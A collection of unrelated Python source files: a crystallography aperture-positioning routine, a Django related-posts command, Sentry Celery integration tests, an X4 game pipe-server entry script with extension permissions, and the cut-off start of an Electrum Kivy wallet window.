Buffer[int(Value)] = base64.b64encode(ResultArray)
else:
Xlimits = (numpy.min(where[1]), numpy.max(where[1]))
Ylimits = (numpy.min(where[0]), numpy.max(where[0]))
submatrix = numpy.zeros((Ylimits[1] - Ylimits[0] + 3, Xlimits[1] - Xlimits[0] + 3))
submatrix[1:-1, 1:-1] = Dtable[Ylimits[0]:Ylimits[1] + 1, Xlimits[0]:Xlimits[1] + 1] * \
(Ztable[Ylimits[0]:Ylimits[1] + 1, Xlimits[0]:Xlimits[1] + 1]==Value)
stretched_submatrix = numpy.zeros((numpy.shape(submatrix)[0] * 10, numpy.shape(submatrix)[1] * 10))
for index in numpy.ndindex(numpy.shape(stretched_submatrix)):
j, i = index
j = int(float(j) / int(10*dy/mind))
i = int(float(i) / int(10*dx/mind))
stretched_submatrix[index] = submatrix[j, i]
silhouette = numpy.array(stretched_submatrix>difminpar, dtype=float)
x = numpy.arange(numpy.shape(stretched_submatrix)[1])
y = numpy.arange(numpy.shape(stretched_submatrix)[0])
x, y = numpy.meshgrid(x, y)
#------------------------------------------------------------------------------------
Correlations = {}
gaussparameter = 0.25
peaks = []
for i in xrange(2):
maximums = []
for aperture in Set:
n = int(5*aperture/mind)
Corr = signal.convolve2d(silhouette, SpotMatrix(n), mode='same')
Correlations[aperture] = Corr
maximums.append(numpy.max(Corr))
# print aperture
# print numpy.max(Corr)
# plt.imshow(Corr, interpolation='nearest', cmap='hot')
# plt.colorbar()
# plt.show()
factor = 10.0
#peaks (X, Y, size)
while True:
num = maximums.index(max(maximums))
factor = maximums[num]
if factor<2.5:
break
Peak = numpy.where(Correlations[Set[num]]==maximums[num])
peaks.append((Peak[1][0], Peak[0][0], Set[num]))
silhouette = silhouette - ((x-Peak[1][0])**2+(y-Peak[0][0])**2<=((10/mind)*Set[num]/2.0)**2)
silhouette[silhouette!=1] = 0
# plt.imshow(silhouette, interpolation='nearest', cmap='hot')
# plt.colorbar()
# plt.show()
for aperture in Set:
subtr = maximums[num]*6.28*((Set[num]/(gaussparameter*mind))**2)*GenerateGaussian2D(x, y, (Peak[1][0], Peak[0][0]), sigma=Set[num]/(gaussparameter*mind))
Correlations[aperture] = Correlations[aperture]-subtr
maximums.append(numpy.max(Correlations[aperture]))
# plt.imshow(Correlations[aperture], interpolation='nearest', cmap='hot')
# plt.colorbar()
# plt.show()
maximums = maximums[len(Set):]
#-----------------------------------------------------------------------------
ResultArray = numpy.zeros((len(peaks), 4))
for n in xrange(len(peaks)):
X = peaks[n][0]/(10.0*(dx/mind)) + Xlimits[0] - 0.5
Y = peaks[n][1]/(10.0*(dy/mind)) + Ylimits[0] - 0.5
size = peaks[n][2]/mind
ResultArray[n, :3] = numpy.array([X, Y, size])
ResultArray[n, 3] = (peaks[n][2]/10.0)**2*numpy.sum(numpy.multiply(stretched_submatrix, ((x-peaks[n][0])**2+(y-peaks[n][1])**2<=((10/mind)*peaks[n][2]/2.0)**2)))
if Value==-2:
ResultArray[n, 3] = ResultArray[n, 3]/100.0
Buffer[int(Value)] = base64.b64encode(ResultArray)
def GetAllPositions(jsondata):
global Buffer, Dtable, Ztable, difminpar, AvailableApertures, size_x, size_y
try:
Dtable = jsondata['MeshBest']['Dtable']
Ztable = jsondata['MeshBest']['Ztable']
except KeyError:
logger.error('jsondata misses precedent MeshBest steps')
return None
difminpar = jsondata['MeshBest']['difminpar']
size_x = jsondata['grid_info']['beam_width']
size_y = jsondata['grid_info']['beam_height']
AvailableApertures = jsondata['beamlineInfo']['beamlineApertures']
manager = mp.Manager()
Buffer = manager.dict()
nCPU = mp.cpu_count()
queue = mp.Queue()
for Value in numpy.unique(Ztable[Ztable!=-1]):
queue.put(Value)
for item in xrange(nCPU):
queue.put(None)
workers = []
for item in xrange(nCPU):
worker = mp.Process(target=BestCorr_MP, args=(queue,))
workers.append(worker)
worker.start()
for worker in workers:
worker.join()
BestPositions = numpy.empty((0, 4), float)
for Value in numpy.unique(Ztable[Ztable!=-1]):
ApertureCorrArray = numpy.fromstring(base64.b64decode(Buffer[Value]))
ApertureCorrArray = ApertureCorrArray.reshape(len(ApertureCorrArray)/4, 4)
BestPositions = numpy.append(BestPositions, ApertureCorrArray, axis=0)
# print '*******\n', BestPositions, '*******\n'
BestPositions = BestPositions[BestPositions[:, 3].argsort()][::-1]
jsondata['MeshBest']['BestPositions'] = base64.b64encode(numpy.ascontiguousarray(BestPositions))
numpy.savetxt('Result_BestPositions.txt', BestPositions, fmt='%0.2f')
|
updateRelation.py
|
import json
from django.core.management.base import BaseCommand
from django.db import transaction
from postdb.models import *
from thulac import thulac
import threading, queue
thu = thulac(seg_only=True, rm_space=True)
cnt_thread = 10
timeout = 10
q = queue.Queue()
mutex = threading.Lock()
class Command(BaseCommand):
def is_biaodian(self, x):
if x == '——':
return True
return x in r''',。、;‘【】、·—《》?:“{}|,./;'[]\=-`<>?:"{}|_+~'''
@transaction.atomic
def go(self):
all = PostInfo.objects.all().values_list('NID', 'title', 'TID')
cnt = 0
l = len(all)
index_all = IndexInfo.objects.all()
ci_all = {}
ps_all = {}
for t in index_all:
ci_all[t.key] = json.loads(t.value)
for t in all:
ps_all[t[0]] = {'title': t[1], 'TID': t[2]}
def work():
nonlocal cnt, l, ci_all, ps_all
while not q.empty():
mutex.acquire()
cnt += 1
print('count {} / {}'.format(cnt, l))
mutex.release()
NID, title = q.get()
ci = thu.cut(' '.join(title.split()))
res = dict()
for x in ci:
if self.is_biaodian(x[0]):
continue
try:
arr = ci_all[x[0]]
for _ in arr:
if _[1] == NID:
continue
if res.get(_[1]):
res[_[1]] += _[0]
else:
res[_[1]] = _[0]
except Exception as e:
pass
mx_limit = 3
ans = []
for (x, y) in res.items():
if len(ans) < mx_limit:
ans.append([x, y])
else:
mn = 0
for j in range(1, mx_limit):
if ans[j][1] < ans[mn][1]:
mn = j
if y > ans[mn][1]:
ans[mn] = [x, y]
ans.sort(key=lambda x: x[1], reverse=True)
ans = [ps_all[ans[i][0]] for i in range(len(ans))]
ans = json.dumps(ans)
obj = None
try:
obj = PostRelation.objects.get(NID=NID)
obj.relation = ans
obj.save()
except Exception as e:
PostRelation.objects.create(NID=NID, relation=ans)
q.task_done()
for t in all:
q.put((t[0], t[1]))
for i in range(cnt_thread):
threading.Thread(target=work()).start()
q.join()
def handle(self, *args, **options):
self.go()
|
test_celery.py
|
import threading
import pytest
pytest.importorskip("celery")
from sentry_sdk import Hub, configure_scope
from sentry_sdk.integrations.celery import CeleryIntegration
from sentry_sdk._compat import text_type
from celery import Celery, VERSION
from celery.bin import worker
@pytest.fixture
def connect_signal(request):
def inner(signal, f):
signal.connect(f)
request.addfinalizer(lambda: signal.disconnect(f))
return inner
@pytest.fixture
def init_celery(sentry_init):
def inner(propagate_traces=True, **kwargs):
sentry_init(
integrations=[CeleryIntegration(propagate_traces=propagate_traces)],
**kwargs
)
celery = Celery(__name__)
if VERSION < (4,):
celery.conf.CELERY_ALWAYS_EAGER = True
else:
celery.conf.task_always_eager = True
return celery
return inner
@pytest.fixture
def celery(init_celery):
return init_celery()
@pytest.fixture(
params=[
lambda task, x, y: (task.delay(x, y), {"args": [x, y], "kwargs": {}}),
lambda task, x, y: (task.apply_async((x, y)), {"args": [x, y], "kwargs": {}}),
lambda task, x, y: (
task.apply_async(args=(x, y)),
{"args": [x, y], "kwargs": {}},
),
lambda task, x, y: (
task.apply_async(kwargs=dict(x=x, y=y)),
{"args": [], "kwargs": {"x": x, "y": y}},
),
]
)
def celery_invocation(request):
"""
Invokes a task in multiple ways Celery allows you to (testing our apply_async monkeypatch).
Currently limited to a task signature of the form foo(x, y)
"""
return request.param
def test_simple(capture_events, celery, celery_invocation):
events = capture_events()
@celery.task(name="dummy_task")
def dummy_task(x, y):
foo = 42 # noqa
return x / y
with Hub.current.start_span() as span:
celery_invocation(dummy_task, 1, 2)
_, expected_context = celery_invocation(dummy_task, 1, 0)
event, = events
assert event["contexts"]["trace"]["trace_id"] == span.trace_id
assert event["contexts"]["trace"]["span_id"] != span.span_id
assert event["transaction"] == "dummy_task"
assert event["extra"]["celery-job"] == dict(
task_name="dummy_task", **expected_context
)
exception, = event["exception"]["values"]
assert exception["type"] == "ZeroDivisionError"
assert exception["mechanism"]["type"] == "celery"
assert exception["stacktrace"]["frames"][0]["vars"]["foo"] == "42"
@pytest.mark.parametrize("task_fails", [True, False], ids=["error", "success"])
def test_transaction_events(capture_events, init_celery, celery_invocation, task_fails):
celery = init_celery(traces_sample_rate=1.0)
@celery.task(name="dummy_task")
def dummy_task(x, y):
return x / y
# XXX: For some reason the first call does not get instrumented properly.
celery_invocation(dummy_task, 1, 1)
events = capture_events()
with Hub.current.start_span(transaction="submission") as span:
celery_invocation(dummy_task, 1, 0 if task_fails else 1)
if task_fails:
error_event = events.pop(0)
assert error_event["contexts"]["trace"]["trace_id"] == span.trace_id
assert error_event["exception"]["values"][0]["type"] == "ZeroDivisionError"
execution_event, submission_event = events
assert execution_event["transaction"] == "dummy_task"
assert submission_event["transaction"] == "submission"
assert execution_event["type"] == submission_event["type"] == "transaction"
assert execution_event["contexts"]["trace"]["trace_id"] == span.trace_id
assert submission_event["contexts"]["trace"]["trace_id"] == span.trace_id
if task_fails:
assert execution_event["contexts"]["trace"]["status"] == "failure"
else:
assert "status" not in execution_event["contexts"]["trace"]
assert execution_event["spans"] == []
assert submission_event["spans"] == [
{
u"description": u"dummy_task",
u"op": "celery.submit",
u"parent_span_id": submission_event["contexts"]["trace"]["span_id"],
u"same_process_as_parent": True,
u"span_id": submission_event["spans"][0]["span_id"],
u"start_timestamp": submission_event["spans"][0]["start_timestamp"],
u"timestamp": submission_event["spans"][0]["timestamp"],
u"trace_id": text_type(span.trace_id),
}
]
def test_no_stackoverflows(celery):
"""We used to have a bug in the Celery integration where its monkeypatching
was repeated for every task invocation, leading to stackoverflows.
See https://github.com/getsentry/sentry-python/issues/265
"""
results = []
@celery.task(name="dummy_task")
def dummy_task():
with configure_scope() as scope:
scope.set_tag("foo", "bar")
results.append(42)
for _ in range(10000):
dummy_task.delay()
assert results == [42] * 10000
with configure_scope() as scope:
assert not scope._tags
def test_simple_no_propagation(capture_events, init_celery):
celery = init_celery(propagate_traces=False)
events = capture_events()
@celery.task(name="dummy_task")
def dummy_task():
1 / 0
with Hub.current.start_span() as span:
dummy_task.delay()
event, = events
assert event["contexts"]["trace"]["trace_id"] != span.trace_id
assert event["transaction"] == "dummy_task"
exception, = event["exception"]["values"]
assert exception["type"] == "ZeroDivisionError"
def test_ignore_expected(capture_events, celery):
events = capture_events()
@celery.task(name="dummy_task", throws=(ZeroDivisionError,))
def dummy_task(x, y):
return x / y
dummy_task.delay(1, 2)
dummy_task.delay(1, 0)
assert not events
def test_broken_prerun(init_celery, connect_signal):
from celery.signals import task_prerun
stack_lengths = []
def crash(*args, **kwargs):
# scope should exist in prerun
stack_lengths.append(len(Hub.current._stack))
1 / 0
# Order here is important to reproduce the bug: In Celery 3, a crashing
# prerun would prevent other preruns from running.
connect_signal(task_prerun, crash)
celery = init_celery()
assert len(Hub.current._stack) == 1
@celery.task(name="dummy_task")
def dummy_task(x, y):
stack_lengths.append(len(Hub.current._stack))
return x / y
if VERSION >= (4,):
dummy_task.delay(2, 2)
else:
with pytest.raises(ZeroDivisionError):
dummy_task.delay(2, 2)
assert len(Hub.current._stack) == 1
if VERSION < (4,):
assert stack_lengths == [2]
else:
assert stack_lengths == [2, 2]
@pytest.mark.xfail(
(4, 2, 0) <= VERSION,
strict=True,
reason="https://github.com/celery/celery/issues/4661",
)
def test_retry(celery, capture_events):
events = capture_events()
failures = [True, True, False]
runs = []
@celery.task(name="dummy_task", bind=True)
def dummy_task(self):
runs.append(1)
try:
if failures.pop(0):
1 / 0
except Exception as exc:
self.retry(max_retries=2, exc=exc)
dummy_task.delay()
assert len(runs) == 3
assert not events
failures = [True, True, True]
runs = []
dummy_task.delay()
assert len(runs) == 3
event, = events
exceptions = event["exception"]["values"]
for e in exceptions:
assert e["type"] == "ZeroDivisionError"
@pytest.mark.skipif(VERSION < (4,), reason="in-memory backend broken")
def test_transport_shutdown(request, celery, capture_events_forksafe, tmpdir):
events = capture_events_forksafe()
celery.conf.worker_max_tasks_per_child = 1
celery.conf.broker_url = "memory://localhost/"
celery.conf.broker_backend = "memory"
celery.conf.result_backend = "file://{}".format(tmpdir.mkdir("celery-results"))
celery.conf.task_always_eager = False
runs = []
@celery.task(name="dummy_task", bind=True)
def dummy_task(self):
runs.append(1)
1 / 0
res = dummy_task.delay()
w = worker.worker(app=celery)
t = threading.Thread(target=w.run)
t.daemon = True
t.start()
with pytest.raises(Exception):
# Celery 4.1 raises a gibberish exception
res.wait()
event = events.read_event()
exception, = event["exception"]["values"]
assert exception["type"] == "ZeroDivisionError"
events.read_flush()
# if this is nonempty, the worker never really forked
assert not runs
|
Main.py
|
'''
Main entry function for the overall python based server.
This will load in individual pipe sub-servers and run their threads.
Initial version just runs a test server.
'''
'''
Note on security:
Loading arbitrary python code can be unsafe. As a light protection,
the pipe server will only load modules that are part of extensions
that have been given explicit permission to run python.
Permissions will be held in a json file, holding the extension id
(from content.xml) and its permission state (generally true).
A special exception will be made for the modding api's id, so it can
load without permission set up.
The permission file will be generated if it doesn't already exist,
but otherwise is left untouched to avoid overwriting user settings.
The general idea is that, if some random extension added a python
plugin to be loaded which may be unsafe, by default it will be rejected
until the user of that extension gives it explicit permission.
TODO: maybe use multiprocessing instead of threading.
TODO: think of a safe, scalable way to handle restarting threads,
particularly subthreads that a user server thread may have started,
which might get orphaned when that thread function exceptions out
on pipe closure. (Currently pipe servers are responsible for
restarting their own subthreads.)
TODO: rethink server restart behavior; perhaps they should not auto-restart,
but instead be fully killed when the x4 pipe closes, and then only
restarted when x4 MD api requests the restart. In this way, mods can change
their python side code on the fly, reload their save, and the new code
would get loaded.
(The md api would need to re-announce servers whenever the game or ui reloads,
as well as whenever the server resets.)
(Perhaps this is less robust in some way?)
(Manual effort needed to clean out the imported packages, similar to what
is done in some gui code for rerunning scripts.)
Overall, it is probably reasonably easy for developers to just shut down
this host server and restart it, if they want to update their server code;
x4 side should automatically reconnect.
temp copy of test args:
-t -x "C:\Steam\steamapps\common\X4 Foundations" -m "extensions\sn_measure_perf\python\Measure_Perf.py"
'''
# Manually list the version for now, since packed exe won't have
# access to the change_log.
version = '1.2'
# Setup include path to this package.
import sys
import json
from pathlib import Path
from collections import defaultdict
import argparse
import time
# To support packages cross-referencing each other, set up this
# top level as a package, findable on the sys path.
# Extra 'frozen' stuff is to support pyinstaller generated exes.
# Note:
# Running from python, home_path is X4_Projects (or whatever the parent
# folder to this package is.
# Running from exe, home_path is the folder with the exe itself.
# In either case, main_path will be to Main.py or the exe.
if getattr(sys, 'frozen', False):
# Note: _MEIPASS gets the directory the packed exe unpacked into,
# eg. in appdata/temp. Need 'executable' for the original exe path.
home_path = Path(sys.executable).parent
main_path = home_path
else:
home_path = Path(__file__).resolve().parents[1]
main_path = Path(__file__).resolve().parent
if str(home_path) not in sys.path:
sys.path.append(str(home_path))
#from X4_Python_Pipe_Server.Servers import Test1
#from X4_Python_Pipe_Server.Servers import Send_Keys
from X4_Python_Pipe_Server.Classes import Server_Thread
from X4_Python_Pipe_Server.Classes import Pipe_Server, Pipe_Client
from X4_Python_Pipe_Server.Classes import Client_Garbage_Collected
import win32api
import winerror
import win32file
import win32pipe
import threading
import traceback
# Note: in other projects importlib.machinery could be used directly,
# but appears to be failing when pyinstalling this package, so do
# a more directly import of machinery.
from importlib import machinery
# Flag to use during development, for extra exception throws.
developer = False
# Use a python test client, instead of needing x4 open.
# Note: putting breakpoints on tested modules requires opening them from
# their extension folder path, not their git repo path that was symlinked over.
test_python_client = 0
# Name of the host pipe.
pipe_name = 'x4_python_host'
# Loaded permissions from pipe_permissions.json.
permissions = None
# Permissions can be placed alongside the exe or Main.py.
# Or maybe in current working directory?
# Go with the exe/main directory.
permissions_path = main_path / 'permissions.json'
def Main():
'''
Launch the server. This generally does not return.
'''
# Set up command line arguments.
argparser = argparse.ArgumentParser(
description = ('Host pipe server for X4 interprocess communication.'
' This will launch extension python modules that are'
' registered by the game through the pipe api.'),
)
argparser.add_argument(
'-p', '--permissions-path',
default = None,
help = 'Optional path to a permissions.json file specifying which'
' extensions are allowed to load modules. If not given, the'
' main server directory is used.' )
argparser.add_argument(
'-t', '--test',
action='store_true',
help = 'Puts this server into test mode. Requires following args:'
' --x4-path, --test_module' )
argparser.add_argument(
'-x', '--x4-path',
default = None,
metavar = 'Path',
help = 'Path to the X4 installation folder. Only needed in test mode.')
argparser.add_argument(
'-m', '--module',
default = None,
help = 'Path to a specific python module to run in test mode,'
' relative to the x4-path.' )
#argparser.add_argument(
# '-v', '--verbose',
# action='store_true',
# help = 'Print extra messages.' )
args = argparser.parse_args(sys.argv[1:])
if args.permissions_path:
global permissions_path
permissions_path = Path.cwd() / (Path(args.permissions_path).resolve())
# The directory should exist.
if not permissions_path.parent.exists():
print('Error: permissions_path directory not found')
return
# Check if running in test mode.
if args.test:
global test_python_client
test_python_client = True
if not args.x4_path:
print('Error: x4_path required in test mode')
return
if not args.module:
print('Error: module required in test mode')
return
# Make x4 path absolute.
args.x4_path = Path.cwd() / (Path(args.x4_path).resolve())
if not args.x4_path.exists():
print('Error: x4_path invalid: {}'.format(args.x4_path))
return
# Keep module path relative.
args.module = Path(args.module)
module_path = args.x4_path / args.module
if not module_path.exists():
print('Error: module invalid: {}'.format(module_path))
return
# List of directly launched threads.
threads = []
# List of relative path strings received from x4, to python server
# modules that have been loaded before.
module_relpaths = []
print('X4 Python Pipe Server v{}\n'.format(version))
# Load permissions, if the permissions file found.
Load_Permissions()
# Put this into a loop, to keep rebooting the server when the
# pipe gets disconnected (eg. x4 loaded a save).
shutdown = False
while not shutdown:
# Start up the baseline control pipe, listening for particular errors.
# TODO: maybe reuse Server_Thread somehow, though don't actually
# want a separate thread for this.
try:
pipe = Pipe_Server(pipe_name)
# For python testing, kick off a client thread.
if test_python_client:
# Set up the reader in another thread.
reader_thread = threading.Thread(target = Pipe_Client_Test, args = (args,))
reader_thread.start()
# Wait for client.
pipe.Connect()
# Clear out any old x4 path; the game may have shut down and
# relaunched from a different location.
x4_path = None
# Listen to runtime messages, announcing relative paths to
# python modules to load from extensions.
while 1:
message = pipe.Read()
print('Received: ' + message)
# A ping will be sent first, testing the pipe from x4 side.
if message == 'ping':
pass
# Handle restart requests similar to pipe disconnect exceptions.
elif message == 'restart':
raise Reset_Requested()
elif message.startswith('package.path:'):
message = message.replace('package.path:','')
# Parse into the base x4 path.
# Example return:
# ".\?.lua;C:\Steam\steamapps\common\X4 Foundations\lua\?.lua;C:\Steam\steamapps\common\X4 Foundations\lua\?\init.lua;"
# Split and convert to proper Paths.
paths = [Path(x) for x in message.split(';')]
# Search for a wanted path.
x4_path = None
for path in paths:
# Different ways to possibly do this.
# This approach will iterate through parents to find the
# "lua" folder, then get its parent.
# (The folder should not be assumed to match the default
# x4 installation folder name, since a user may have
# changed it if running multiple installs.)
test_path = path
# Loop while more parents are present.
while test_path.parents:
# Check the parent.
test_path = test_path.parent
if test_path.stem == "lua":
x4_path = test_path.parent
break
# Stop looping once an x4_path found.
if x4_path:
break
elif message.startswith('modules:'):
message = message.replace('modules:','')
# If no x4_path yet seen, ignore.
if not x4_path:
continue
# Break apart the modules. Semicolon separated, with an
# ending separator.
# This list will end with an empty entry, even if the message
# has no paths, so can throw away the last list item.
module_paths = [Path(x) for x in message.split(';')[:-1]]
# Handle each path.
for module_path in module_paths:
# If this module has already been processed, ignore it.
# This will happen when x4 reloads saves and such, and all
# md scripts re-announce their server files.
if module_path in module_relpaths:
print('Module was already loaded: {}'.format(module_path))
continue
# Put together the full path.
full_path = x4_path / module_path
# Check if this module is part of an extension
# that has permission to run, and skip if not.
if not Check_Permission(x4_path, module_path):
continue
# Record this path as seen.
module_relpaths.append(module_path)
# Import the module.
module = Import(full_path)
# Pull out the main() function.
main = getattr(module, 'main', None)
# Start the thread.
if main != None:
thread = Server_Thread(module.main, test = test_python_client)
threads.append(thread)
else:
print('Module lacks "main()": {}'.format(module_path))
except (win32api.error, Client_Garbage_Collected) as ex:
# win32api.error exceptions have the fields:
# winerror : integer error code (eg. 109)
# funcname : Name of function that errored, eg. 'ReadFile'
# strerror : String description of error
# If just in testing mode, assume the tests completed and
# shut down.
if test_python_client:
print('Stopping test.')
shutdown = True
elif isinstance(ex, Client_Garbage_Collected):
print('Pipe client garbage collected, restarting.')
# If another host was already running, there will have been
# an error when trying to set up the pipe.
elif ex.funcname == 'CreateNamedPipe':
print('Pipe creation error. Is another instance already running?')
shutdown = True
# If X4 was reloaded, this results in a ERROR_BROKEN_PIPE error
# (assuming x4 lua was wrestled into closing its pipe properly
# on garbage collection).
# Update: as of x4 3.0 or so, garbage collection started crashing
# the game, so this error is only expected when x4 shuts down
# entirely.
elif ex.winerror == winerror.ERROR_BROKEN_PIPE:
# Keep running the server.
print('Pipe client disconnected.')
# This should now loop back and restart the pipe, if
# shutdown wasn't set.
if not shutdown:
print('Restarting host.')
except Exception as ex:
# Any other exception, reraise for now.
raise ex
finally:
# Close the pipe if open.
# This will error if the exit condition was a CreateNamedPipe
# error, so just wrap it for safety.
try:
pipe.Close()
except Exception as ex:
pass
# Let subthreads keep running; they internally loop.
#if threads:
# print('Shutting down subthreads.')
## Close all subthreads.
#for thread in threads:
# thread.Close()
## Wait for closures to complete.
#for thread in threads:
# thread.Join()
#base_thread = Server_Thread(Control)
# TODO: dynamically load in server modules from extensions.
# Need to check which extensions are enabled/disabled, and determine
# what the protocol will be for file naming.
#-Removed; old test code for hardcoded server paths.
## Start all server threads.
## Just a test for now.
#threads = [
# Server_Thread(Test1.main),
# Server_Thread(Send_Keys.main),
#]
## Wait for them all to finish.
#for thread in threads:
# thread.Join()
return
def Import(full_path):
'''
Code for importing a module, broken out for convenience.
'''
try:
# Attempt to load/run the module.
module = machinery.SourceFileLoader(
# Provide the name sys will use for this module.
# Use the basename to get rid of any path, and prefix
# to ensure the name is unique (don't want to collide
# with other loaded modules).
'user_module_' + full_path.name.replace(' ','_'),
# Just grab the name; it should be found on included paths.
str(full_path)
).load_module()
print('Imported {}'.format(full_path))
except Exception as ex:
module = None
# Make a nice message, to prevent a full stack trace being
# dropped on the user.
print('Failed to import {}'.format(full_path))
print('Exception of type "{}" encountered.\n'.format(
type(ex).__name__))
ex_text = str(ex)
if ex_text:
print(ex_text)
# In dev mode, print the exception traceback.
if developer:
print(traceback.format_exc())
# Raise it again, just in case vs can helpfully break
# at the problem point. (This won't help with the gui up.)
raise ex
#else:
# Print('Enable developer mode for exception stack trace.')
return module
def Load_Permissions():
'''
Loads the permissions json file, or creates one if needed.
'''
global permissions
if permissions_path.exists():
try:
with open(permissions_path, 'r') as file:
permissions = json.load(file)
print('Loaded permissions file at {}\n'.format(permissions_path))
except Exception as ex:
print('Error when loading permissions file')
# If nothing was loaded, write (or overwrite) the default permissions file.
if permissions == None:
permissions = {
'instructions': 'Set which extensions are allowed to load modules,'
' based on extension id (in content.xml).',
# Workshop id of the mod support apis.
'ws_2042901274' : True,
}
print('Generating default permissions file at {}\n'.format(permissions_path))
with open(permissions_path, 'w') as file:
json.dump(permissions, file, indent = 2)
return
def Check_Permission(x4_path, module_path):
'''
Check if the module on the given path has permission to run.
Return True if permitted, else False with a printed message.
'''
try:
# Find the extension's root folder.
if not module_path.as_posix().startswith('extensions/'):
raise Exception('Module is not in extensions')
# The module_path should start with 'extensions', so find the
# second folder.
# (Note: pathlib is dump and doesn't allow negative indices on parents.)
ext_dir = x4_path / [x for x in module_path.parents][-3]
# Load the content.xml. Can do xml or raw text; text should
# be good enough for now (avoid adding lxml to the exe).
content_text = (ext_dir / 'content.xml').read_text()
# The first id="..." should be the extension id.
content_id = content_text.split('id="')[1].split('"')[0]
# Check its permission.
if permissions.get(content_id) == True:
return True
print('\n'.join([
'',
'Rejecting module due to missing permission:',
' content_id: {}'.format(content_id),
' path: {}'.format(x4_path / module_path),
'To allow loading, enable this content_id in {}'.format(permissions_path),
'',
]))
return False
except Exception as ex:
print('\n'.join([
'',
'Rejecting module due to error during extension id permission check:',
' path: {}'.format(x4_path / module_path),
'{}: {}'.format(type(ex).__name__, ex if str(ex) else 'Unspecified'),
'',
]))
return False
def Pipe_Client_Test(args):
'''
Function to mimic the x4 client.
'''
pipe = Pipe_Client(pipe_name)
if not args.x4_path or not args.x4_path.exists():
raise Exception('Test error: invalid x4 path')
# Example lua package path.
#package_path = r".\?.lua;C:\Steam\steamapps\common\X4 Foundations\lua\?.lua;C:\Steam\steamapps\common\X4 Foundations\lua\?\init.lua;"
package_path = r".\?.lua;{0}\lua\?.lua;{0}\lua\?\init.lua;".format(args.x4_path)
# Announce the package path.
pipe.Write("package.path:" + package_path)
# Announce module relative paths.
# Just one test module for now.
# Give as_posix style.
modules = [
args.module.as_posix(),
]
# Separated with ';', end with a ';'.
message = ';'.join(modules) + ';'
pipe.Write("modules:" + message)
# Keep-alive blocking read.
pipe.Read()
return
if __name__ == '__main__':
Main()
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet_db import WalletDB
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.plugin import run_hook
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
PR_PAID, PR_FAILED, maybe_extract_bolt11_invoice)
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import PasswordDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
